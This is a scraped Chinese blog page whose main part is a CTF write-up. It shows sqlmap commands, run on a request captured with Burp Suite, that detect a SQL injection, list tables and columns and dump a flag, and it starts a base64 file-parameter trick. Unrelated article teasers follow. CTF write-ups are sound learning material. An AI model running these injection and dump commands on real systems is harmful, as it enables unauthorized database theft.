张小明
前端开发工程师
)
当输入1的时候会返回成绩
但是在URL中并没有出现GET传参,所以大概率是POST了。
需要用我们的工具sqlmap
在这之前,我们需要用Burp Suite抓包。
发送到重放器,右键,复制到文件
打开是这样的,好了主备工作完成,打开sqlmap
L:\gj\sqlmap>python sqlmap.py -r "1.txt"他说目标接口id存在高危sql注入漏洞
可以注入我们就进行下一步,爆表
python sqlmap.py -r "1.txt" --tables出来了数据库名和表名,继续爆列名。
ython sqlmap.py -r "1.txt" -D skctf -T fl4g --columns得到列明了,提取数据
python sqlmap.py -r "1.txt" -D skctf -T fl4g -C skctf_flag --dumpflag{7bc17ff3453fef76f405bf3fb68cc9a9}
打开之后是这样的是一些乱七八糟的字母也没有规律可言但是一眼就注意到了url中的?line&filenamea2V5cy50eHQ后面这个像一个base64,解码看看是keys.txt文件,如果是这样我们就知道了,想要访问某个文件必须是base64编码之后的,那…
)
李华
GET请求乱码 GET请求方式乱码分析 GET方式提交参数的方式是将 编写如下servlet 使用表单方式提交参数 编写index.html 启动tomcat 此时并未出现乱码 如果修改如下编码方式为GBK 可以看到请求行中只有四个字节(GBK中,一个汉字对应两个字节࿰…
李华
节日贺卡设计:用 LobeChat 生成走心祝福语 在每年的节日季,写一张贺卡看似简单,却常常让人卡在第一句——“亲爱的”之后该接什么?是太正式显得生分,还是太随意少了仪式感?我们想要表达的情感很真ÿ…
李华
LobeChat:构建下一代AI交互的开源基石 在人工智能浪潮席卷各行各业的今天,大语言模型(LLM)的能力早已不再神秘。从GPT到Claude,再到各类开源模型,我们手握强大的“大脑”,但真正让这些智能落地、…
李华
市场上的降AI率工具良莠不齐,如何科学判断降AI率效果是很多学生、老师最关心的问题,担心降不来AI率,耽误时间还花不少钱。 本文将从以下五个维度系统,分析2025年主流的8个降AI工具,教大家如何选择适合自己的降AIGC工具…
李华
前言:起初在写jsoncpp样例的时候,写出了一个这样的悬垂指针的bug,代码如下:int main() {Json::Value root;root["name"] "zhangsan";root["age"] 18;root["sex"] "mele";ro…
李华